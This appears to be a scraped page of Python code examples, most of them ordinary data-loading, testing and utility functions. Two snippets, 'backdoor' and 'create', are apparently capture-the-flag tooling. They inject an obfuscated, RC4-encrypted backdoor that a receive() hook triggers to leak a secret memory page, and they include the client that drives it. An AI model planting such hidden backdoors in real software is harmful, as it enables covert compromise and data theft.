Esempio n. 1
0
def getDataAndLabels():
    data = read(DATA_PICKLE)
    labels = read(LABELS_PICKLE)
    if data is None or labels is None:
        data = np.load(DATA_FILE)
        labels = np.load(LABELS_FILE)
        save(data, DATA_PICKLE)
        save(labels, LABELS_PICKLE)
    labels = transformLabels(labels)
    return [data, labels]
Esempio n. 2
0
def getDataAndLabels():
    data = read(DATA_PATH)
    labels = read(LABELS_PATH)
    if data is None or labels is None:
        for dir in files:
            for index in files[dir]:
                [data, labels] = doStuff(dir, index, data, labels)
        save(data, DATA_PATH)
        save(labels, LABELS_PATH)
    labels = transformLabels(labels)
    return [data, labels]
Esempio n. 3
0
def main():
    train = read("train.rd")
    develop = read("develop.rd")

    text_clf = Pipeline([('vect', CountVectorizer()),
                         ('tfidf', TfidfTransformer()), ('clf', SVC())])

    text_clf = text_clf.fit(train.features[0], train.labels)

    write("model.rd", text_clf)

    predicted = text_clf.predict(develop.features[0])

    print np.mean(predicted == develop.labels)
Esempio n. 4
0
def checkpath(path, structure):
    expectedFiles = structure.get('files')
    expectedAllFile = structure.get('allFile')
    print('checking', path)
    if expectedAllFile != None or expectedFiles != None:
        files = set(os.listdir(path))
        if structure.get('includesIndex'):
            files.remove(config.indexFileName)
            indexedFiles = util.readlines(
                os.path.join(path, config.indexFileName))
            for line in indexedFiles:
                assert line[
                    0] != '\n', 'Az .index fájl az utolsó sor kivételével nem tartalmazhat üres sorokat!'
            assert indexedFiles[-1][
                -1] == '\n', 'Az .index fájl utolsó sora egy üres sor kell hogy legyen! (most ez "' + indexedFiles[
                    -1] + '")'
            indexedFiles = set(
                [file.rstrip('\n') for file in indexedFiles if file != '\n'])
            assert files == indexedFiles, 'Az .index fájl tartalma invalid!'
        else:
            assert config.indexFileName not in files, 'Ennek a könyvtárnak nem lehet .index fájlja!'
        if expectedAllFile != None:
            for file in files:
                checkpath(os.path.join(path, file), expectedAllFile)
        elif expectedFiles != None:
            expectedFileSet = set(expectedFiles.keys())
            assert expectedFileSet == files, 'Ennek a könytárnak pontosan ezen fájlokat kell tartalmaznia: ' + str(
                expectedFileSet)
            for file in files:
                checkpath(os.path.join(path, file), expectedFiles[file])
    else:
        _, ext = os.path.splitext(path)
        assertByExt = assertsByExt.get(ext)
        if assertByExt != None:
            assertByExt(util.read(path), structure)
Esempio n. 5
0
File: app.py Progetto: uzak/reftest
    def check(self, name):
        data = self.getSource()
        fnRef = self.fnRef(name)
        fnOrig = self.fnOrig(name)

        # save references only?
        if self.save:
            util.mkdir(self.config.REF_DIR)
            util.write(fnRef, data)

        else: # compare
            assert os.path.exists(fnRef), "Cannot compare without reference file: %s" % fnRef

            util.mkdir(self.outputDir)
            # first save original file
            util.write(fnOrig, data)

            ref = self.cleanup(util.read(fnRef))
            data = self.cleanup(data)

            # htmldiff
            result = htmldiff.htmldiff(ref, data, True)
            util.write(self.fnHtmlDiff(name), result)
            self.scenario.results[name] = self._eval_diff(result)

            # difflib
            linesRef = ref.splitlines()
            linesData = data.splitlines()
            result = difflib.HtmlDiff(wrapcolumn=80).make_file(linesRef, linesData, fnRef, fnOrig, context=True)
            util.write(self.fnDiffLib(name), result)
Esempio n. 6
0
def main():
    train_raw = read("train.raw")
    develop_raw = read("develop.raw")
    test_raw = read("test.raw")

    train_data, train_labels = vectorize(train_raw)
    develop_data, develop_labels = vectorize(develop_raw)
    test_data, test_labels = vectorize(test_raw)

    train_recrod = Record(features(train_data), train_labels)
    develop_recrod = Record(features(develop_data), develop_labels)
    test_recrod = Record(features(test_data), test_labels)

    write("train.rd", train_recrod)
    write("develop.rd", develop_recrod)
    write("test.rd", test_recrod)
Esempio n. 7
0
def write_to_csv(apk_paths):

    for file_path in apk_paths:
        obj = APK(file_path)
        obj = APK(read(file_path), raw=True)

        list_of_obtained_permissions = obj.get_permissions()
        #print(list_of_obtained_permissions)

        result = []
        for permission in list_of_permissions:
            if permission in list_of_obtained_permissions:
                result.append(1)
            else:
                result.append(0)

        package_name = obj.get_package()
        result.append(package_name)

        package_size = obj.file_size
        result.append(package_size)

        result.append(1)

        with open("./saurabh_dataset.csv", "a") as f:
            writer = csv.writer(f, dialect='excel')
            writer.writerow(result)
Esempio n. 8
0
    def test_read(self):
        """
        Test if app can get a single item by ID
        """
        todo1 = create(self, 'Write app tests')
        todo2 = create(self,
            'Write automation tests', completed=True)

        read1 = read(self, todo1['id'])
        read2 = read(self, todo2['id'])

        assert read1 == todo1
        assert read2 == todo2

        read3 = read(self, todo2['id'] + 1)
        assert read3 is None
def getDataAndLabels():
    [data, labels] = [read(DATA_PATH), read(LABELS_PATH)]
    # filenames = [getFileNames()[0]]
    filenames = getFileNames()
    if data is None or labels is None:
        data = None
        labels = []
        for filename in filenames:
            [subjectData, subjectLabels] = getDataAndLabelsForSubject(filename)
            if data is None:
                data = subjectData
            else:
                data = np.concatenate([data, subjectData], axis=-1)
            labels = labels + subjectLabels
        labels = np.array(labels)
        save(data, DATA_PATH)
        save(labels, LABELS_PATH)
    return [data, labels]
Esempio n. 10
0
def index():
    # online_users = mongo.db.users.find({"online": True})
    fake_count = collection.find({"label": "Fake"}).count()
    real_count = collection.find({"label": "Real"}).count()

    return render_template("index.html",
                           message="Dashboard",
                           timeseries=util.read(),
                           fake_count=fake_count,
                           real_count=real_count)
def getDataAndLabels():
    data = read(DATA_PICKLE)
    labels = read(LABELS_PICKLE)
    if data is None or labels is None:
        for subject in files:
            for session in files[subject]:
                if data is None:
                    data = getData(subject, session)
                else:
                    data = np.concatenate([data, getData(subject, session)])
                if labels is None:
                    labels = getLabels(subject, session)
                else:
                    labels = np.concatenate(
                        [labels, getLabels(subject, session)])
        save(data, DATA_PICKLE)
        save(labels, LABELS_PICKLE)
    labels = transformLabels(labels)
    return [data, labels]
Esempio n. 12
0
 def __init__(self, chips, alpha, gamma, agent):
     Player.__init__(self, chips)
     self.gamma = gamma
     self.alpha = alpha
     self.agent = agent
     # Read in the table if it exists, otherwise create a new one
     if self.agent == Constants.APPROXIMATE:
         if os.path.exists(Constants.WFILE):
             self.weights = util.read(self.agent)
             self.values = defaultdict()
         else:
             self.weights = defaultdict(float)
             self.values = defaultdict()
     else:
         if os.path.exists(Constants.QFILE):
             self.values = util.read(self.agent)
         else:
             self.values = defaultdict(float)
     self.eval = Evaluator()
Esempio n. 13
0
def load_map(name):
    file = util.read("{}{}_info.txt".format(util.MAPS_FOLDER, name))
    tiles = {}
    for line in file:

        if line.startswith("#"):
            continue

        # Define keyword
        # Defines a map char to a tile coordinate on the sprite sheet,
        # and determines whether to collide or not
        def_match = re.match(DEF_PATTERN, line)

        if def_match:
            clip = def_match.group(1) != "^"
            char = def_match.group(2)
            sheet = def_match.group(3)
            sheet_x = int(def_match.group(4))
            sheet_y = int(def_match.group(5))

            rect = pygame.Rect(sheet_x * TILE_SIZE, sheet_y * TILE_SIZE,
                               TILE_SIZE, TILE_SIZE)
            tiles[char] = util.get_sheet(
                "tile\\{}.png".format(sheet)).get_image(rect)

    for i in range(3):
        text_map = util.read("{}{}_map_layer{}.txt".format(
            util.MAPS_FOLDER, name, i))
        map_surface = pygame.Surface(
            (len(text_map[0]) * TILE_SIZE, len(text_map) * TILE_SIZE))
        map_surface.fill((0, 0, 255))
        map_surface.set_colorkey((0, 0, 255), pygame.RLEACCEL)

        x = y = 0
        for line in text_map:
            for char in line:
                if char != " ":
                    map_surface.blit(tiles[char], (x, y))
                x += TILE_SIZE
            y += TILE_SIZE
            x = 0
        map.append(Map(i == 1, map_surface))
Esempio n. 14
0
  def get(obj, start_byte, end_byte, identifier=""):
    content = util.read(obj, start_byte, end_byte)
    lines = list(content.split(tsv.Iterator.IDENTIFIER))

    if identifier == "q-value":
      lines = list(filter(lambda line: len(line.strip()) > 0, lines))
      lines = list(map(lambda line: (Iterator.getQValue(line), line), lines))
    elif identifier != "":
      raise Exception("Unknown identifier for percolator format", identifier)

    return lines
Esempio n. 15
0
def generate_item(category):
    item = Item()
    item.category = category
    template = util.load_constructor()[category]
    location = template.pop("location")
    item.kind = selector.pick_random(template)
    template = template[item.kind]
    location += template["location"]
    names = util.read(location).split("\n")
    item.name = selector.pick_random(names)
    return item
Esempio n. 16
0
def stage(relpath, add_to=True):
    ri = read_index()

    # find the first instance of relpath
    ridx = next((i for i, j in enumerate(ri) if j[1] == relpath), None)

    # index structure
    # blob_hash, rel_path, mtime, size
    if add_to:
        bs = wstat(relpath)
        # file is already in the index, it might need to be updated with a new blob, and stats
        if ridx is not None:

            # the file has been updated, update its stats
            if ri[ridx][2] != bs[0] or ri[ridx][2] != bs[0]:
                bc = read(relpath)
                bh = hashbuf(bc)

                # if the blob does not already exists, then create, otherwise, reuse
                if not exists(bh):
                    objects.write(bh, bc)

                ri[ridx] = (bh, relpath, bs[0], bs[1])
        else:
            bc = read(relpath)
            bh = hashbuf(bc)

            # if the blob does not already exists, then create, otherwise, reuse
            if not exists(bh):
                objects.write(bh, bc)
            ri.append((bh, relpath, bs[0], bs[1]))
    # bvc stage rm relpath
    # remove the file from working directory and remove from index
    else:
        if ridx is not None:
            delete(relpath)
            del ri[ridx]

    # sort the index
    sri = sorted(ri, key=lambda x: x[1])
    write_index(sri)
Esempio n. 17
0
def load():
    global scams, classifiers, responses, default, contacted
    scams = [scam for scam in listdir('scams') if isdir(('scams/%s' % scam))]
    classifiers = dict([(scam, classifier(scam)) for scam in scams])
    responses = [(scam, load_responses(scam)) for scam in scams]
    default = read('scams/responses').split('###')
    try:
        contactFile = open('data/contacted', 'r')
        contacted = pickle.load(contactFile)
        contactFile.close()
    except IOError:
        pass  # data/contacted doesnt yet exist, leave contacted as empty set
Esempio n. 18
0
File: data.py Progetto: jamii/scampy
def load():
  global scams, classifiers, responses, default, contacted
  scams = [scam for scam in listdir('scams') if isdir(('scams/%s' % scam))]
  classifiers = dict( [(scam, classifier(scam)) for scam in scams] )
  responses = [(scam, load_responses(scam)) for scam in scams]
  default = read('scams/responses').split('###')
  try:
    contactFile = open('data/contacted','r')
    contacted = pickle.load(contactFile)
    contactFile.close()
  except IOError:
    pass # data/contacted doesnt yet exist, leave contacted as empty set
Esempio n. 19
0
    def test_read(self):
        """
        Test if API can get a single item by ID
        """
        todo = {"title": 'Write API tests',
                "order": self.order,
                "user_id":1}

        todo = create(self, url='/api', inp=todo)

        read1 = read(self, todo['id'], url='/api')

        assert read1 == todo
Esempio n. 20
0
def load_map(name):
    file = util.read("{}{}_info.txt".format(util.MAPS_FOLDER, name))
    tiles = {}
    for line in file:

        if line.startswith("#"):
            continue

        # Define keyword
        # Defines a map char to a tile coordinate on the sprite sheet,
        # and determines whether to collide or not
        def_match = re.match(DEF_PATTERN, line)

        if def_match:
            clip = def_match.group(1) != "^"
            char = def_match.group(2)
            sheet = def_match.group(3)
            sheet_x = int(def_match.group(4))
            sheet_y = int(def_match.group(5))

            rect = pygame.Rect(sheet_x * TILE_SIZE, sheet_y * TILE_SIZE, TILE_SIZE, TILE_SIZE)
            tiles[char] = util.get_sheet("tile\\{}.png".format(sheet)).get_image(rect)

    for i in range(3):
        text_map = util.read("{}{}_map_layer{}.txt".format(util.MAPS_FOLDER, name, i))
        map_surface = pygame.Surface((len(text_map[0]) * TILE_SIZE, len(text_map) * TILE_SIZE))
        map_surface.fill((0, 0, 255))
        map_surface.set_colorkey((0, 0, 255), pygame.RLEACCEL)

        x = y = 0
        for line in text_map:
            for char in line:
                if char != " ":
                    map_surface.blit(tiles[char], (x, y))
                x += TILE_SIZE
            y += TILE_SIZE
            x = 0
        map.append(Map(i == 1, map_surface))
Esempio n. 21
0
def declare(linker):
    if not '_terminate' in linker:
        linker.declare(headers=headers)
        linker.autodecl(read('stdlib/libc.c'))
        linker.autodecl(read('stdlib/syscalls.c'))
        linker.autodecl(read('stdlib/ctype.c'))
        linker.autodecl(read('stdlib/string.c'))
        linker.autodecl(read('stdlib/chk.c'))
        linker.declare(headers='#include <stdarg.h>')
        linker.autodecl(read('stdlib/io.c'))
        linker.declare(symbols={
            'itoa': 'char *itoa(unsigned int i, int base)',
            'atoi': 'int atoi(char *str)',
        }, source=read('stdlib/num.c'))
Esempio n. 22
0
def make_branch(name):
    # prevent a branch from creating if it already exists
    if util.exists(os.path.join('.bvc', 'branches', name)):
        return

    cc = refs.head()
    hh = util.read(os.path.join('.bvc', 'HEAD')).strip()

    # create a new commit that serves as the root of the branch
    cb = "%s\t%s\t%s" %(cc[0], time.time(), 'Create branch: ' + name)
    ch = filespace.hashbuf(cb)
    objects.write(ch, cb)

    # update the ref log
    refs.append(ch)

    # creates the branches file
    util.write(os.path.join('.bvc', 'branches', name), ch + os.linesep)
Esempio n. 23
0
    def test_update(self):
        """
        Test if app can update order of a todo item by ID
        """
        todo = create(self, 'Write app tests')
        id = todo['id']

        updates = dict(**todo)
        updates['completed'] = True
        updates['title'] = 'Write all app tests'

        req = self.client.put(
            '/todos/%d' % id,
            data=json.dumps(updates),
            content_type='application/json')
        updated = json.loads(req.data)

        assert updated == updates
        assert read(self, id) == updates
Esempio n. 24
0
def global2local(csvfile, bvhfile):
    data, header = read(csvfile)
    animation, _, joints, joints_structure, _ = read_bvh(bvhfile)
    data = data.reshape(data.shape[0], int(data.shape[1] / 7), 7)

    Ts = []
    joint_names = []
    for i in range(0, data.shape[1]):
        quaternions = data[:, i, 0:4]
        quaternions = np.concatenate(
            [quaternions[:, [-1]], quaternions[:, :3]], axis=1)
        translations = data[:, i, 4:]
        Ts += [get_transforms(translations, quaternions)]
        joint_names += [header[i * 7][:-3]]
    local_Ts = []

    for joint in joints[1:]:
        if joint.startswith("End"):
            continue
        print(joint)
        parent_joint = joint_names.index(
            get_parent(joint, joints, joints_structure))
        local_Ts += [
            get_local_transform(parent_Ts=Ts[parent_joint],
                                Ts=Ts[joint_names.index(joint)])
        ]
    transform = to_quaternions(local_Ts)

    local_transforms = np.concatenate(transform, axis=1)
    transforms = np.concatenate([data[:, 1], local_transforms], axis=1)

    joints = [j for j in joints if not j.startswith("End")]
    header = create_header(joints)
    for j in joints:
        header += []

    np.savetxt(csvfile[:-4] + "_local.csv",
               transforms,
               fmt='%10.5f',
               delimiter=",",
               header=",".join(header),
               comments="")
Esempio n. 25
0
    def test_update(self):
        """
        Test if API can update order of a todo item by ID
        """
        payload = {"title": 'Write API tests',
                "order": self.order,
                "user_id":1}

        todo = create(self, url='/api', inp=payload)
        id = todo['id']

        updates = {'order': 2}

        req = self.client.put(
            '/api/todos/%d' % id,
            data=updates,
            content_type='application/json')

        assert read(self, id, url='/api')['order'] == 2 
        assert req.status_code == 204 
Esempio n. 26
0
def detectpattern(path,savepath,min_supp=0.05):
    ff=open(savepath,'w')
    S=u.read(path)
    count = 0
    for each in S:
        count += 1
    patterns = prefixSpan(SquencePattern([], sys.maxint), S, min_supp * count)
    #print_patterns(patterns)
    seqNums = []
    for each in patterns:
        seqNums.append(each.squence)
    maxSeqs = u.maxSeq(seqNums)
    for i in maxSeqs:
        for sth in i:
            #print >> ff,"[",
            for ssth in sth:
                print >> ff,ssth,
            #print >> ff,"]",
        print >> ff,""
    ff.close()
Esempio n. 27
0
    def allowed_sections(self):
        loaded = util.read("allowed", 0)

        read = 0
        al = {}

        for a in loaded:
            if a.startswith('#'):
                continue
            elif a.startswith('@'):
                if (a.find('section') > -1):
                    read |= config.RF_SECTION
                continue
            elif a.startswith('\n'):
                read = 0
                continue
            else:
                if ((read & config.RF_SECTION) == config.RF_SECTION):
                    n = a.split(":")
                    al[n[0]] = n[1].replace("\n", "")
        return al
Esempio n. 28
0
def restart(case_dir,iteration='current'):
    
    if isinstance(iteration,str):
        case_iter_dir=case_dir+'/'+iteration+'.case'
    else:
        case_iter_dir=case_dir+'/iter'+str(iteration).zfill(8)+'.case'

    simulation = read(case_iter_dir+'/case.p')
    log('Restarting ',case_iter_dir)
    simulation.read_mesh(case_iter_dir+'/mesh.cf3mesh')
    simulation.create_space_discretization( order = simulation.order, riemann_solver = simulation.riemann_solver )
    simulation.pde.time.current_time = simulation.begin_time
    simulation.pde.time.iteration = simulation.iteration
    bcs = simulation.bcs
    simulation.bcs = []
    for bc in bcs:
        simulation.add_bc(str(bc[0]),str(bc[1]),bc[2],**bc[3])
    simulation.set_time_discretization( type = simulation.solver_type )
    simulation.set_cfl(str(simulation.max_cfl)) # set the current cfl number
    simulation.set_cfl(str(simulation.cfl)) # set the cfl function
    simulation.set_time_accurate(simulation.time_accurate)
    simulation.solver.children.history.read(URI(case_iter_dir+'/history.tsv'))
    return simulation
Esempio n. 29
0
def main():
    parser = argparse.ArgumentParser(
        description='Check whether all attached files are found')
    parser.add_argument('gnucash_file')
    parser.add_argument('base_path')
    args = parser.parse_args()

    doc = minidom.parseString(util.read(args.gnucash_file))

    slot_values = doc.getElementsByTagName('slot')

    file_paths = []

    for x in slot_values:
        slot_key = x.getElementsByTagName('slot:key')[0].firstChild.data

        if slot_key == 'assoc_uri':
            rel_path = request.url2pathname(
                urllib.parse.urlparse(
                    x.getElementsByTagName('slot:value')
                    [0].firstChild.data).path)

            # remove leading slashes as this breaks os.path.join
            while rel_path[0] == '/':
                rel_path = rel_path[1:]

            file_paths.append(os.path.join(args.base_path, rel_path))

    print("Found {} files to search in base path '{}'...".format(
        len(file_paths), args.base_path))
    errors = [x for x in file_paths if not os.path.exists(x)]

    for e in errors:
        print("Failed to find {}...".format(e))

    print("Found {} errors in {} files!".format(len(errors), len(file_paths)))
Esempio n. 30
0
def backdoor(pt):
    c = read('backdoor/tweetnacl.c')
    c = c.replace('#include "tweetnacl.h"', '')
    h = read('backdoor/tweetnacl.h')
    pubkey = read('backdoor/pubkey.h')
    randombytes = r'''
    void randombytes(uint8_t *msg, uint64_t len) {
        syscall3(SYS_random, (uint32_t)msg, len, 0);
    }
    '''

    # TODO: transmit_all / receive_all?
    code = r'''
    #define NONCE_LEN 8
    #define SM_LEN 0x48
    void handshake() {
        uint8_t nonce[NONCE_LEN];
        syscall3(SYS_random, (uint32_t)nonce, NONCE_LEN, 0);
        syscall4(SYS_transmit, 1, (uint32_t)nonce, NONCE_LEN, 0);

        uint32_t smlen = SM_LEN;
        uint8_t *sm, *m;
        if (syscall3(SYS_allocate, smlen, 0, (uint32_t)&sm) ||
           (syscall3(SYS_allocate, smlen, 0, (uint32_t)&m))) {
            _terminate(1);
        }
        syscall4(SYS_receive, 0, (uint32_t)sm, smlen, 0);

        uint64_t mlen;
        int valid = crypto_sign_open(m, &mlen, sm, smlen, pubkey);
        if (valid == 0 && memcmp(m, nonce, NONCE_LEN) == 0) {
            syscall4(SYS_transmit, 1, 0x4347c000, 4, 0);
        }
        syscall1(SYS__terminate, 2);
    }
    '''

    code = h + pubkey + code + randombytes + c
    backdoor_addr, size = pt.inject(c=code, size=True)

    # rc4-encrypt the backdoor so you can't ROP directly into the type2 pov
    # this block also intercepts the receive() syscall function
    rc4_key = os.urandom(16)

    # as part of rc4-encrypting, we relocate the backdoor to the NX page so it doesn't add 1000+ ROP gadgets
    xor = rc4(rc4_key)
    data = pt.elf.read(backdoor_addr, size)
    for i in xrange(len(data)):
        data[i] ^= xor.next()
    shadow_addr = pt.inject(raw=data, target='nx', silent=True)
    pt.patch(backdoor_addr, raw=size * '\x00', silent=True)


    # xor key so they can't just pull it out of memory
    key_otp = os.urandom(len(rc4_key))
    key = ''.join([chr(ord(c) ^ ord(key_otp[i])) for i, c in enumerate(rc4_key)])
    str2c = lambda x: ', '.join(map(str, map(ord, x)))

    call_backdoor = r'''
    void call_backdoor() {
        void (*backdoor)() = (void (*)())%d;
        char *shadow_addr = (char *)%d;
        size_t bd_size = %d;
        memcpy(backdoor, shadow_addr, bd_size);

        uint8_t state[256];
        uint8_t rc4_key[] = {%s};
        uint8_t rc4_otp[] = {%s};
        int keylen = %d;
        for (int i = 0; i < keylen; i++) {
            rc4_key[i] ^= rc4_otp[i];
        }
        ksa(state, rc4_key, keylen);
        rc4(state, (uint8_t *)backdoor, bd_size);

        backdoor();
        // always exit after backdoor so there's not a decrypted type 2 POV in memory you can ROP into
        _terminate(0);
    }
    ''' % (backdoor_addr, shadow_addr, size, str2c(key), str2c(key_otp), len(key))

    receive_hook_head = r'''
    void call_backdoor();
    void check_init(char *buf, uint32_t size);
    int _receive(int fd, void *buf, uint32_t size, uint32_t *count);
    #define WINDOW 9
    char bufsave[WINDOW] = {1};
    uint32_t first = 1, saved = 1, pos = 1;
    int receive(int fd, void *_buf, uint32_t size, uint32_t *count) {
        char *buf = (char *)_buf;
        // shortcut if we've run and buffer is empty, or on fd > 0
        if (fd != 0 || saved == 0) {
            return _receive(fd, buf, size, count);
        } else if (first) {
            first = 0;
            if (size < WINDOW) {
                int ret = _receive(fd, bufsave, WINDOW, &saved);
                if (ret) return ret;
                check_init(bufsave, saved);
                pos = 0;
            } else {
                int ret = _receive(fd, buf, size, &saved);
                if (ret) return ret;
                if (count) *count = saved;
                check_init(buf, saved);
                saved = 0;
                return ret;
            }
        }
        // flush buffer
        if (saved > 0 && saved < size) {
            memcpy(buf, bufsave + pos, saved);
            if (count) *count = saved;
            uint32_t tmp;
            int ret = _receive(fd, buf + saved, size - saved, &tmp);
            saved = 0;
            if (ret) return ret;
            if (count) *count += tmp;
            return ret;
        } else if (saved >= size) {
            memcpy(buf, bufsave + pos, size);
            if (count) *count = size;
            saved -= size;
            pos += size;
        }
        return 0;
    }'''
    receive_hook_tail = r'''
    void check_init(char *buf, uint32_t size) {
        if (size < 5) return;
        char hash[4];
        for (int i = 0; i < 4; i++) hash[i] = buf[i];
        char *key = "ECAF";
        for (int i = 4; i < size; i++) {
            for (int j = 0; j < 4; j++) {
                hash[j] ^= buf[i];
            }
            if (*(uint32_t *)hash == *(uint32_t *)key) {
                size = i + 1;
                // respond with inverted key so POV can seek ahead to handshake
                for (int j = 0; j < size; j++) {
                    buf[j] ^= 0xff;
                }
                transmit(1, buf, size, 0);
                call_backdoor();
            }
        }
    }
    ''' + call_backdoor

    def patch_receive(code, syms):
        if syms == ['receive']:
            out = []
            # TODO: this is really gross text parsing
            out.append(receive_hook_head)
            for line in code.split('\n'):
                if line.startswith('int receive(') and line.endswith('{'):
                    out.append(line.replace('int receive(', 'int _receive(', 1))
                else:
                    out.append(line)
            out.append(receive_hook_tail)
            return '\n'.join(out)

    pt.binary.linker.onpre(patch_receive)
Esempio n. 31
0
def declare(linker):
    linker.autodecl(read('crypto/rc4.c'))
Esempio n. 32
0
def get_package_version(file_):
    """get version from top-level package init"""
    return read(file_)
Esempio n. 33
0
def commit(ch):
    return tuple(read(os.path.join(dirpath, ch)).split('\n')[0].split('\t'))
Esempio n. 34
0
def tree(th):
    # print([l for l in read(os.path.join(dirpath, th)) if l])
    return list(map(lambda l: tuple(l.split('\t')), [l for l in read(os.path.join(dirpath, th)).split(os.linesep) if l] ))
Esempio n. 35
0
def create(pt):
    c = read('backdoor/tweetnacl.c')
    c = c.replace('#include "tweetnacl.h"', '')
    h = read('backdoor/tweetnacl.h')
    privkey = read('backdoor/privkey.h')
    randombytes = r'''
    void randombytes(uint8_t *msg, uint64_t len) {
        random(msg, (uint32_t)len, 0);
    }
    '''

    code = r'''
    void _start() {
        uint32_t negotiate = 2;
        transmit(3, &negotiate, 4, 0);
        for (int i = 0; i < 3; i++) {
            receive(3, &negotiate, 4, 0);
        }

        // generate handshake key
        char key[9] = {'E', 'C', 'A', 'F'};
        // random length from 5-8
        uint8_t b = 0;
        random(&b, 1, 0);
        int length = 5 + (b % 4);

        for (int i = 4; i < length; i++) {
            uint8_t b = 0;
            while (!b) random(&b, 1, 0);
            key[i] = b;
            for (int j = 0; j < 4; j++) {
                key[j] ^= b;
            }
        }
        transmit(1, key, length, 0);

        // wait for key response
        for (int i = 0; i < length; i++) {
            key[i] ^= 0xff;
        }
        char ring[8] = {0};
        int p = 0;
        while (1) {
            uint32_t count = 0;
            if (receive(0, ring + p, 1, &count) || count == 0) _terminate(1);
            int match = 0;
            for (int i = 0; i < length; i++) {
                int off = (p - length + i + 1) % 8;
                if (off < 0) off += 8;
                if (ring[off] != key[i]) break;
                match++;
            }
            if (match == length) break;

            p = (p + 1) % 8;
        }

        uint8_t nonce[8];
        if (receive(0, nonce, 8, 0)) _terminate(1);

        uint8_t *sm;
        uint64_t smlen = 8 + crypto_sign_BYTES;
        if (allocate(smlen, 0, &sm)) _terminate(1);
        crypto_sign(sm, &smlen, nonce, 8, privkey);

        size_t size = smlen;
        transmit(1, &size, 4, 0);
        transmit(1, sm, size, 0);

        char flag[4];
        receive(0, flag, 4, 0);
        transmit(3, flag, 4, 0);

        _terminate(0);
    }
    '''

    code = h + privkey + code + randombytes + c
    pt.entry = pt.inject(c=code)
	def __init__(self, cfg):
		self.fname = cfg
		self._cache = json.loads(b64decode(read(cfg, default="")) or "{}")
Esempio n. 37
0
    maxSeqs = u.maxSeq(seqNums)
    for i in maxSeqs:
        for sth in i:
            #print >> ff,"[",
            for ssth in sth:
                print >> ff,ssth,
            #print >> ff,"]",
        print >> ff,""
    ff.close()



if __name__ == "__main__":
    ff = open('datas/result.txt','w')
    #S = u.read("datas/gxyseq.csv")
    S=u.read("PrefixSpan.txt")
    min_supp=0.05
    count = 0
    for each in S:
        count += 1
    patterns = prefixSpan(SquencePattern([], sys.maxint), S, min_supp * count)
    print_patterns(patterns)
    seqNums = []
    for each in patterns:
        seqNums.append(each.squence)
    maxSeqs = u.maxSeq(seqNums)
    print("The sequential patterns :")
    for i in maxSeqs:
        for sth in i:
            print "[",
            for ssth in sth:
Esempio n. 38
0
from oauth_dropins import tumblr as oauth_tumblr
from oauth_dropins.webutil.flask_util import flash
from oauth_dropins.webutil.util import json_dumps, json_loads
from werkzeug.exceptions import BadRequest

from flask_app import app
import models
import superfeedr
import util

logger = logging.getLogger(__name__)

TUMBLR_AVATAR_URL = 'http://api.tumblr.com/v2/blog/%s/avatar/512'
DISQUS_API_CREATE_POST_URL = 'https://disqus.com/api/3.0/posts/create.json'
DISQUS_API_THREAD_DETAILS_URL = 'http://disqus.com/api/3.0/threads/details.json'
DISQUS_ACCESS_TOKEN = util.read('disqus_access_token')
DISQUS_API_KEY = util.read('disqus_api_key')
DISQUS_API_SECRET = util.read('disqus_api_secret')

# Tumblr has no single standard markup or JS for integrating Disqus. It does
# have a default way, but themes often do it themselves, differently. Sigh.
# Details in https://github.com/snarfed/bridgy/issues/278
DISQUS_SHORTNAME_RES = (
    re.compile(
        """
    (?:https?://disqus\.com/forums|disqus[ -_]?(?:user|short)?name)
    \ *[=:/]\ *['"]?
    ([^/"\' ]+)     # the actual shortname
    """, re.IGNORECASE | re.VERBOSE),
    re.compile('https?://([^./"\' ]+)\.disqus\.com/embed\.js'),
)
Esempio n. 39
0
def main():
    test = read("test.rd")
    model = read("model.rd")

    predicted = model.predict(test.features[0])
    print np.mean(predicted == test.labels)
			p = (password and getpass.getpass or raw_input)(key)
			if raw_input("store %s? [Y/n]: "%(password and "password" or "value")).lower().startswith("n"):
				return p
			self._cache[dk] = b64encode(p)
			self._save()
		return b64decode(self._cache[dk])

pc = PCache(".ctp")

def _getpass(val, ptype):
	if "{PASSWORD}" in val:
		val = val.replace("{PASSWORD}", pc("enter password (%s): "%(ptype,)))
	return val

config = Config(cfg)
for key, val in [[term.strip() for term in line.split(" = ")] for line in read("ct.cfg", True)]:
	if key in ["ENCODE", "DB_ECHO", "DB_PUBLIC", "GEO_TEST", "CACHE_REQUEST", "CACHE_DB"]:
		val = val == "True"
	if key == "DB":
		config.db.update(config.web.server, _getpass(val, "db"))
	elif key == "DB_TEST":
		config.db.update("test", _getpass(val, "test db"))
	else:
		target = key.lower()
		c = config
		if "_" in target:
			if target in ["pubsub_botnames", "log_allow", "geo_user_geonames", "geo_user_google"]:
				val = val.split("|")
			path, target = target.rsplit("_", 1)
			for part in path.split("_"):
				c = getattr(c, part)
Esempio n. 41
0
# init my opener
paramters = urllib.urlencode({
    'xh': code,
    'xm': name.decode('utf-8').encode('gbk'),
    'gnmkdm': 'N121605'
})
cookiename = 'cookie.dat'
cookie = cookielib.MozillaCookieJar(cookiename)
cookie.load(cookiename, ignore_discard=True, ignore_expires=True)
opener = getopener(cookie)

para_dct = {}
response = opener.open(baseurl + paramters)

temp_content = read(response)

viewstate = re.compile('id="__VIEWSTATE" value="(.*)"').search(
    temp_content).groups()[0]
eventvali = re.compile('id="__EVENTVALIDATION" value="(.*)"').search(
    temp_content).groups()[0]

para_dct['ddlxn'] = year + '-' + str(int(year) + 1)
para_dct['ddlxq'] = term
para_dct['btn_cx'] = ' 查  询 '.decode('utf-8').encode('gbk')
para_dct['__EVENTTARGET'] = ''
para_dct['__EVENTARGUMENT'] = ''
para_dct['__LASTFOCUS'] = ''
para_dct['__VIEWSTATE'] = viewstate
para_dct['__EVENTVALIDATION'] = eventvali
para_data = urllib.urlencode(para_dct)
Esempio n. 42
0
def declare(linker):
    linker.autodecl(read('crypto/rc4.c'))
Esempio n. 43
0
def blob(bh):
    return read(os.path.join(dirpath, bh), 'r')
Esempio n. 44
0
            flag = False
            for item in each:
                if flag:
                    aitem += "&"
                aitem += item
                flag = True
            aitem += "]"
            name += aitem
            name += "]"
        print ("pattern:{0}, support:{1}".format(name, p.support))
        print >> ff, ("pattern:{0}, support:{1}".format(name, p.support))


if __name__ == "__main__":
    ff = open("datas/result.txt", "w")
    S = u.read("datas/gxyseq.csv")
    min_supp = 0.01
    count = 0
    for each in S:
        count += 1
    patterns = prefixSpan(SquencePattern([], sys.maxint), S, min_supp * count)
    print_patterns(patterns)
    seqNums = []
    for each in patterns:
        seqNums.append(each.squence)
    maxSeqs = u.maxSeq(seqNums)
    print ("The sequential patterns :")
    for i in maxSeqs:
        for sth in i:
            print "[",
            for ssth in sth:
Esempio n. 45
0
import os
import functools
from util import read
